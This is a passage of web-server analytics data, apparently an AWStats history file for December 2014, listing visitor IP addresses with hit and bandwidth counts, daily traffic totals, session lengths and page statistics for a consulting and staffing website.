132.255.100.13 1 7 42768 20141223125354
61.90.22.56 2 11 43989 20141201023232
115.246.230.1 6 6 21504 20141201011054
166.181.81.157 1 7 42768 20141215141325
88.198.208.66 1 1 1288 20141203183453
68.234.17.186 1 1 3801 20141206110417
115.245.166.254 3 18 100415 20141211104441
199.30.25.40 0 4 6833 
113.254.126.109 1 7 42768 20141202190242
74.52.245.146 2 2 2614 20141222080012
68.234.20.207 1 1 1354 20141206110418
179.234.22.15 1 7 42768 20141228105646
125.16.180.5 1 10 43198 20141223003455
82.145.209.132 3 18 68579 20141227124411
82.125.145.93 1 7 42768 20141225091938
191.177.162.233 1 7 42768 20141210153422
220.255.1.112 0 1 2757 
177.97.83.223 1 7 42768 20141208124122
199.125.14.41 2 2 2576 20141202032841
120.60.148.14 1 7 42768 20141216060258
50.7.8.226 1 1 1288 20141221194429
177.20.224.194 1 7 42768 20141229123643
41.215.254.75 3 13 67212 20141226020740
175.145.93.246 2 14 70934 20141226002003
177.9.175.180 1 7 42768 20141204205845
90.218.169.156 1 7 42768 20141206181742
130.211.161.150 1 1 1312 20141221111901
179.210.252.10 1 7 42768 20141208163253
27.123.213.245 1 7 42768 20141221223033
208.79.232.208 2 2 2576 20141205084720
130.211.165.50 1 1 1312 20141230122559
103.251.248.18 5 28 139876 20141223224541
222.239.162.7 2 2 2576 20141226072537
183.228.41.216 1 1 107986 20141221102527
41.85.192.110 27 49 270764 20141224064152
80.42.118.192 1 1 107986 20141205061232
23.236.57.166 1 1 1312 20141224122626
182.64.177.230 1 1 1288 20141217035757
54.172.178.135 1 1 1288 20141209132312
202.182.49.26 1 7 42768 20141209214828
146.148.43.169 1 1 1312 20141214122838
71.197.120.240 1 7 42768 20141219011733
73.175.78.83 5 19 103338 20141205152733
177.85.4.27 1 7 42768 20141219065708
193.239.56.21 1 1 1288 20141216051902
187.29.73.64 1 7 42768 20141223144330
81.136.183.56 1 7 42768 20141205081934
101.199.112.50 1 3 14926 20141222232022
103.246.39.213 1 1 4222 20141202030310
197.76.172.200 1 7 42768 20141228004649
142.4.218.201 1 1 1288 20141221203448
201.37.254.229 1 7 42768 20141220225935
222.164.45.254 1 10 43198 20141209082936
166.137.244.62 1 10 41798 20141211102133
179.187.143.206 1 7 42768 20141221093642
67.222.194.119 1 1 7044 20141228093559
61.135.190.222 1 1 1288 20141225085115
177.66.209.25 1 7 42768 20141217110453
89.115.96.25 1 7 42768 20141227100036
183.159.73.79 1 1 1307 20141224102813
103.246.38.196 4 4 16434 20141230010954
36.55.62.88 1 7 42768 20141226095103
173.208.46.8 1 1 1288 20141206104544
70.194.17.94 2 12 56478 20141204154719
189.101.34.103 1 7 42768 20141212142424
190.200.16.135 1 7 42768 20141227205610
187.19.8.190 1 7 42768 20141221073138
62.49.136.121 1 7 42768 20141208100914
116.87.236.250 3 12 56766 20141221002810
151.97.48.100 1 7 42768 20141219050435
177.103.231.148 1 7 42768 20141215061429
54.174.110.221 1 1 1288 20141205211607
66.11.128.152 4 4 5152 20141222213139
76.173.150.57 1 7 42768 20141230225029
79.50.128.247 1 7 42768 20141228125403
183.60.243.189 1 1 1288 20141213223938
64.134.157.131 3 16 87370 20141201115803
67.255.205.121 1 10 44934 20141215091614
130.211.132.50 1 1 1312 20141203112033
173.15.208.33 5 23 139808 20141222104542
119.147.146.195 1 2 5132 20141228194134
187.10.165.20 1 7 42768 20141211094741
82.131.96.226 1 1 268 20141217214954
8.18.2.254 2 17 95351 20141230123313
130.211.176.169 1 1 1312 20141202112009
217.77.220.156 2 2 2614 20141224190800
85.206.12.230 1 7 42768 20141213024151
112.198.77.104 3 16 85614 20141202010429
208.93.104.8 4 4 2020 20141231024750
178.23.154.192 1 1 1307 20141227083117
177.42.238.186 1 7 42768 20141218141358
130.211.166.222 1 1 1312 20141225122609
220.181.132.216 0 1 3863 
189.76.204.94 1 7 42768 20141204150706
46.189.141.252 1 7 42768 20141228094942
191.95.242.134 1 7 42768 20141228234937
178.42.197.144 1 1 1288 20141204002609
111.68.38.183 1 7 42768 20141211161916
220.181.108.141 1 1 1307 20141209050603
31.218.225.102 1 3 14926 20141206004846
190.5.157.190 1 7 42768 20141230161930
220.181.108.159 1 1 5666 20141206224305
82.145.219.139 1 4 15494 20141224002726
146.148.36.214 1 1 1312 20141211122918
89.155.15.40 1 7 42768 20141206095046
177.42.166.167 1 7 42768 20141227204424
130.211.152.204 1 1 1312 20141227111815
54.80.140.72 1 1 1288 20141222092342
109.60.127.150 1 7 42768 20141210113326
186.222.254.140 1 7 42768 20141208184701
189.100.147.162 1 7 42768 20141205180013
62.24.252.133 3 5 124651 20141212140501
182.118.44.102 1 3 14926 20141222172248
87.11.66.66 1 7 42768 20141207033823
4.59.247.178 5 18 92903 20141212074025
182.73.148.94 0 1 2780 
187.59.162.209 1 7 42768 20141228060809
190.7.180.134 1 7 42768 20141228132152
190.7.30.186 1 7 42768 20141215101642
201.62.57.167 1 7 42768 20141228044517
23.236.124.225 1 1 1288 20141215195433
76.181.94.23 1 10 44934 20141209112201
69.50.216.246 2 2 2576 20141223035450
61.135.190.223 1 2 5132 20141205062124
178.33.138.64 2 2 8443 20141218092002
209.99.48.186 1 10 42696 20141202014359
201.55.144.34 1 7 42768 20141231111413
54.72.253.52 2 2 2576 20141203212908
177.100.225.182 1 7 42768 20141216184824
182.248.150.2 1 1 1288 20141217054210
54.177.88.142 6 6 20755 20141209153626
182.118.53.180 1 3 14926 20141210215955
54.176.244.67 2 2 488 20141230032058
122.168.210.113 1 6 42200 20141228095237
199.30.25.7 0 6 38503 
187.85.14.26 1 7 42768 20141220043257
130.211.169.196 1 1 1312 20141222122715
54.174.38.216 1 1 1288 20141201235301
82.43.87.6 1 7 42768 20141222125309
62.231.95.181 2 2 2624 20141219070549
54.226.155.23 1 1 1288 20141209052043
61.135.190.219 1 2 5132 20141208025609
177.80.80.62 1 7 42768 20141208135257
99.189.226.192 8 27 199523 20141217154611
54.77.24.246 2 2 2576 20141203193618
121.7.210.38 1 7 42768 20141207000339
201.33.235.54 1 7 42768 20141227103753
141.0.9.218 15 67 356373 20141225045603
54.174.24.237 1 1 1288 20141201201320
31.13.110.122 1 1 1307 20141223133920
179.215.87.13 1 7 42768 20141228143237
54.91.16.247 3 3 732 20141219074455
69.197.55.196 1 1 3611 20141206063844
62.210.84.129 2 2 2614 20141230020319
82.145.218.198 1 10 44934 20141215003241
68.6.109.112 32 99 837468 20141216133126
177.65.44.19 1 7 42768 20141205154003
178.254.209.6 1 7 42768 20141230170216
179.160.44.239 1 7 42768 20141223061714
146.148.69.32 1 1 1312 20141218122837
115.66.18.100 1 10 43198 20141211000215
85.10.199.67 3 3 2877 20141207050043
130.211.148.239 1 1 1312 20141231122602
181.239.29.109 1 7 42768 20141229112609
130.211.184.2 1 1 1312 20141219111930
110.34.13.4 1 7 42768 20141217050005
220.255.1.94 0 2 5502 
220.255.1.129 0 1 2757 
207.108.227.150 1 8 43328 20141212115610
54.173.196.146 1 1 1288 20141201202414
198.50.195.215 1 1 1288 20141215110321
69.58.178.59 10 10 38321 20141205211141
37.152.35.94 1 7 42768 20141212043111
130.211.139.20 1 1 1312 20141205112140
105.238.17.22 1 7 42768 20141203134835
130.211.135.146 1 1 1312 20141222111905
61.12.35.124 2 14 70934 20141203052123
146.148.52.232 1 1 1312 20141211112021
161.168.251.105 1 7 42768 20141209105816
36.77.19.23 1 7 42768 20141208033831
183.228.210.11 1 1 107986 20141212143601
31.210.47.152 2 8 43012 20141219031419
220.181.132.197 1 3 14926 20141228120758
135.23.213.209 1 7 42768 20141208232500
178.152.172.146 4 19 102632 20141203105428
220.255.1.105 0 1 12403 
203.117.37.212 1 10 43198 20141212031234
173.208.103.4 1 1 3592 20141206104547
93.92.217.228 2 2 2576 20141216103345
82.49.169.135 1 7 42768 20141211065444
87.216.62.43 4 21 128925 20141210110052
61.135.190.224 1 2 5132 20141206062044
76.124.2.82 1 1 1288 20141208235838
54.172.114.2 1 1 1288 20141201235825
209.190.1.131 5 5 19467 20141203152518
41.215.254.73 2 17 95351 20141225011347
23.251.154.212 1 1 1312 20141209112038
79.156.157.37 1 7 42768 20141214044445
220.255.1.57 0 2 1331 
81.133.197.65 1 7 42768 20141215130309
93.137.200.196 1 7 42768 20141211151140
14.192.212.84 1 10 43198 20141224114010
108.171.211.74 4 4 3064 20141223035449
208.79.15.145 30 73 539299 20141202093004
31.45.241.64 1 7 42768 20141202033934
92.234.13.60 3 16 85614 20141208061342
187.94.205.133 1 7 42768 20141213154848
31.11.237.222 1 1 1288 20141220174058
89.105.214.40 2 2 1551 20141225003307
123.125.71.26 1 1 4460 20141206224305
192.241.152.221 12 14 49198 20141221164802
191.249.147.196 1 6 16816 20141227152550
188.67.55.129 1 7 42768 20141210170052
177.94.48.194 1 7 42768 20141209120838
173.234.59.148 1 1 4028 20141206104545
180.252.218.239 1 7 42768 20141229231548
220.255.1.139 2 8 64450 20141209041901
176.205.72.235 1 7 42768 20141205133352
46.229.170.197 6 6 7728 20141230010110
130.211.155.1 1 1 1312 20141206122912
200.149.204.33 0 1 25952 
90.178.61.110 1 1 1288 20141225180256
177.4.208.35 1 7 42768 20141215124321
130.211.131.34 1 1 1312 20141227122604
89.66.66.178 1 1 1288 20141219223056
130.211.148.1 1 1 1312 20141231111825
177.158.107.121 0 2 35746 
200.164.151.86 1 7 42768 20141218124334
130.211.178.157 1 1 1312 20141230111828
91.185.194.122 1 1 1288 20141203222350
220.181.127.233 3 3 3921 20141228120740
173.252.195.17 1 1 6911 20141206182513
216.52.192.177 1 7 42768 20141210133112
213.34.214.43 2 14 71392 20141210050047
54.162.184.221 1 3 14926 20141202041215
82.145.211.51 1 10 44934 20141215141528
220.255.1.165 1 3 5894 20141209041853
176.102.37.93 1 1 1312 20141207203733
177.7.116.69 1 7 42768 20141214195950
201.229.46.29 1 7 42768 20141201072330
177.137.49.135 1 6 42200 20141228082854
54.145.188.167 1 1 1288 20141209062705
54.76.53.240 2 2 2576 20141203230517
220.255.1.21 1 1 6896 20141211031658
115.42.138.62 2 12 56539 20141222034410
130.211.150.165 1 1 1312 20141229135412
187.14.46.16 1 7 42768 20141206200332
198.252.44.11 9 9 11808 20141230102057
220.255.1.27 0 2 20088 
211.244.83.215 1 1 1288 20141210085101
191.5.239.246 1 7 42768 20141213192729
2.83.104.91 1 7 42768 20141219125855
89.105.212.20 2 2 1551 20141231220406
177.33.112.238 1 7 42768 20141228102936
192.81.47.189 2 2 2576 20141215134817
220.181.132.198 1 3 14926 20141226150425
23.22.146.60 1 1 1288 20141204064702
220.255.1.128 0 1 560 
67.232.128.243 1 10 42696 20141220011450
198.211.102.42 6 7 24599 20141228031400
182.118.45.12 1 3 14926 20141225184733
130.211.151.85 1 1 1312 20141203122847
203.171.209.6 1 6 36365 20141230010956
8.25.228.21 4 21 126589 20141203142054
189.115.215.235 1 7 42768 20141217105726
192.99.9.164 1 1 1307 20141215085453
199.30.80.111 1 1 1288 20141203044459
190.34.47.82 1 3 14926 20141213004006
190.73.143.233 1 7 42768 20141212111651
84.33.17.203 1 1 244 20141214005357
173.234.227.45 1 1 1288 20141206104544
177.41.13.8 0 1 560 
54.74.29.115 2 14 85536 20141226152859
182.118.53.159 1 3 14926 20141222231031
36.231.137.251 1 1 1288 20141216113959
190.105.157.101 1 7 42768 20141210190928
82.145.216.184 5 31 163399 20141224005628
130.211.190.97 1 1 1312 20141220122734
146.148.58.60 1 1 1312 20141210112033
220.181.108.81 1 1 6911 20141206224305
130.211.115.226 1 1 1312 20141215122903
123.125.71.33 1 1 5081 20141206224305
176.202.100.152 1 3 14926 20141212135119
201.74.4.136 1 7 42768 20141222115451
54.242.134.165 27 56 403353 20141208135518
23.90.213.82 1 1 1307 20141205154832
93.33.49.166 1 7 42768 20141231141410
54.198.140.110 1 3 14926 20141218125231
54.68.97.166 1 2 5132 20141225025605
37.228.106.190 1 13 67050 20141230045806
181.114.38.237 1 7 42768 20141207161441
173.234.250.251 1 1 3460 20141206104546
208.93.104.10 13 13 8392 20141231001047
220.255.1.171 0 1 2780 
115.66.0.180 1 10 43198 20141209115256
79.19.189.121 1 7 42768 20141206181945
197.218.79.172 1 6 42200 20141209223755
191.183.36.213 1 7 42768 20141213062318
208.118.103.162 3 19 111909 20141219111724
93.42.163.135 1 7 42768 20141226143346
182.118.53.17 1 3 14926 20141222223252
74.91.37.171 1 1 6915 20141206182521
198.252.44.8 8 8 10496 20141228085132
182.73.13.118 2 2 7890 20141227222431
166.121.37.18 1 11 66762 20141202030307
220.181.132.194 1 3 14926 20141224080117
186.42.28.229 1 7 42768 20141224202049
123.125.71.23 2 2 109312 20141209075658
23.236.53.76 1 1 1312 20141208122942
191.53.230.78 1 6 42200 20141206112823
106.215.181.27 1 7 42768 20141215104531
46.173.65.216 1 1 1307 20141206222631
23.236.62.250 1 1 1312 20141214111952
67.129.79.226 1 10 41798 20141226180151
187.113.49.213 1 7 42768 20141226224256
180.244.166.224 1 7 42768 20141215212343
208.79.15.152 6 19 96569 20141202093730
110.23.70.143 1 7 42768 20141207113716
121.7.192.162 1 10 43198 20141223043801
187.73.86.97 1 7 42768 20141210203735
92.0.60.184 1 7 42768 20141209034453
62.75.223.114 1 1 1288 20141207193449
72.8.148.39 1 1 4184 20141206063843
177.82.245.200 1 7 42768 20141213120520
31.3.233.120 31 31 39928 20141231220322
130.211.189.187 1 1 1312 20141220111949
123.125.71.98 1 1 7044 20141206224305
41.215.254.74 1 7 42768 20141225044121
211.244.83.232 1 1 1288 20141221064358
190.114.248.30 1 7 42768 20141223134549
54.161.3.39 1 1 1307 20141208131021
130.211.175.233 1 1 1312 20141201123007
179.32.178.231 1 7 42768 20141223165052
41.13.76.40 1 7 42768 20141202114845
104.128.30.179 2 2 8443 20141229143146
201.66.106.69 1 7 42768 20141201083027
162.217.120.1 5 20 125808 20141210144835
61.135.190.104 1 1 1288 20141226132438
62.210.244.152 16 16 20608 20141211105234
23.251.157.138 1 1 1312 20141212122944
173.234.227.228 1 1 4028 20141206104544
182.118.44.250 1 3 14926 20141219232352
66.249.92.37 0 1 25952 
88.182.39.175 1 7 42768 20141209195844
177.68.71.123 1 7 42768 20141224084507
115.119.120.244 3 3 11835 20141220231938
54.172.168.100 1 1 1288 20141205154849
189.78.63.18 1 6 42200 20141201131536
130.211.126.178 1 1 1312 20141217152326
189.75.66.112 1 7 42768 20141229082435
173.163.95.58 1 7 42768 20141202113427
188.40.86.200 1 1 1288 20141219040628
107.178.223.152 1 1 1312 20141225111823
106.78.206.127 4 18 114896 20141216022630
189.48.202.34 1 7 42768 20141212204314
182.118.44.99 1 3 14926 20141211073652
137.135.208.61 3 3 3864 20141212010248
77.54.251.45 1 7 42768 20141215050414
191.33.3.189 1 7 42768 20141224092013
54.91.252.33 1 3 14926 20141202074029
93.170.186.71 2 2 2576 20141225100911
213.159.38.90 1 1 1307 20141217184626
193.230.151.2 8 26 185617 20141208065946
130.211.168.121 1 1 1312 20141207111227
182.118.43.237 1 3 14926 20141226155441
31.147.157.54 1 7 42768 20141214141041
180.191.20.102 1 7 42768 20141213013543
123.125.71.24 1 1 5150 20141206224305
209.105.248.113 1 1 244 20141225074016
85.138.18.82 1 7 42768 20141221094317
66.249.81.171 1 1 1288 20141218235723
194.29.185.244 1 1 1288 20141215140044
198.199.66.52 6 7 24599 20141209134303
173.234.232.79 1 1 4222 20141206104545
23.251.153.71 1 1 1312 20141210122909
82.153.6.59 1 7 42768 20141222060302
74.190.116.95 2 14 71392 20141218092145
66.229.185.139 2 2 8443 20141222192132
80.200.106.116 1 7 42768 20141226051310
70.210.225.184 1 7 42768 20141215203054
130.211.143.220 1 1 1312 20141226111917
130.211.161.82 1 1 1312 20141202122854
41.215.254.67 1 7 42768 20141225010138
23.251.151.57 1 1 1312 20141221122654
212.215.223.132 1 7 42768 20141202083726
1.187.207.7 1 6 42200 20141201121018
177.157.109.166 1 7 42768 20141220163906
54.255.164.206 2 2 2576 20141204064358
177.177.32.16 1 7 42768 20141230110113
101.226.11.205 1 1 1288 20141228042412
220.255.1.25 5 7 67749 20141211032639
54.255.187.18 2 2 488 20141231013703
188.72.96.157 1 1 1288 20141212130748
123.30.175.222 2 2 2614 20141208080936
203.117.37.234 1 10 43198 20141212040223
182.118.60.17 1 3 14926 20141211131918
173.234.37.245 1 1 6179 20141206182512
203.117.69.119 1 10 43198 20141229214210
196.43.235.253 3 12 53743 20141215073504
97.74.4.58 1 1 1288 20141202175525
184.73.1.180 1 3 14926 20141218121235
130.211.125.60 1 1 1312 20141206112123
50.16.29.112 1 1 1288 20141220133600
188.138.26.210 1 1 1288 20141207193507
173.234.233.74 1 7 42768 20141202033602
54.72.197.69 2 2 2576 20141203212919
201.79.14.251 1 7 42768 20141205101604
179.183.91.159 1 7 42768 20141216030734
220.181.108.175 1 1 4241 20141206224305
72.107.125.189 6 32 169889 20141205111232
177.9.237.228 1 7 42768 20141213131408
54.86.209.250 4 4 5152 20141215171942
116.87.209.22 1 10 43198 20141215010948
220.255.1.156 0 1 569 
99.227.154.140 1 7 42768 20141206113956
130.211.177.103 1 1 1312 20141224111817
46.229.168.50 2 2 5316 20141231133738
54.77.209.199 1 1 1288 20141228135713
62.24.181.135 1 2 5170 20141212043143
125.96.160.132 1 6 42200 20141206193209
199.30.24.202 1 7 42768 20141228203411
130.211.190.114 1 1 1312 20141217163233
182.118.53.107 1 1 1288 20141229001205
END_VISITOR

# Date - Pages - Hits - Bandwidth - Visits
BEGIN_DAY 31
20141201 40 126 625156 28
20141202 67 219 1294415 26
20141203 56 168 814753 30
20141204 26 79 367204 22
20141205 47 160 1040874 28
20141206 51 126 662907 49
20141207 22 53 241284 22
20141208 94 288 1880822 31
20141209 614 749 3468090 52
20141210 45 157 847336 26
20141211 36 133 696305 24
20141212 61 169 982586 28
20141213 23 74 395901 22
20141214 23 60 311585 12
20141215 40 172 849243 36
20141216 39 150 972178 23
20141217 32 118 641782 23
20141218 22 85 468955 20
20141219 33 126 650390 26
20141220 46 163 889615 21
20141221 30 88 546513 21
20141222 46 164 957830 30
20141223 38 162 847289 28
20141224 61 183 942899 28
20141225 46 163 794803 27
20141226 31 125 636033 23
20141227 24 106 556176 20
20141228 58 275 1313426 39
20141229 23 86 452903 19
20141230 45 182 1025681 25
20141231 29 81 386516 22
END_DAY

# Session range - Number of visits
BEGIN_SESSION 7
1h+ 1
5mn-15mn 12
0s-30s 764
15mn-30mn 6
30s-2mn 19
2mn-5mn 21
30mn-1h 8
END_SESSION

# URL - Pages - Bandwidth - Entry - Exit
# The 10 first Pages must be first (order not required for others)
BEGIN_SIDER 31
/default.asp 778 939532 719 639
/company.asp 134 562144 9 18
/consultants.asp 132 545717 5 15
/home.asp 115 456794 7 18
/services.asp 90 322045 4 22
/clients.asp 85 293334 7 4
/contactus.asp 80 352883 4 16
/aboutus.asp 74 278298 2 6
/index.asp 52 69190 2 3
/careerresources.asp 36 183481 2 9
/cs105a.asp 7 35386 1 1
/jobsearch.asp 3 10139 2 2
/cs101a.asp 5 28047 1 1
/goldenrules.asp 13 103512 7 9
/cs104a.asp 5 28948 0 0
/cs103a.asp 4 21641 0 0
/cs108a.asp 6 33834 1 1
/cs102d.asp 6 41323 2 2
/history.asp 22 114296 0 5
/staffing.asp 27 103856 4 5
/projectservices.asp 31 169969 1 2
/interviewprep.asp 31 213661 28 25
/news.asp 21 82529 5 6
/cs106a.asp 6 36912 1 1
/interviewquestions.asp 6 30085 2 3
/cs101b.asp 7 49146 2 3
/registerapply.asp 4 13540 4 1
/cs107a.asp 5 22246 0 0
/casestudies.asp 30 139260 1 4
/docs/rjcm_a_157849.pdf 9 971912 5 6
/testimonials.asp 24 106574 3 4
END_SIDER
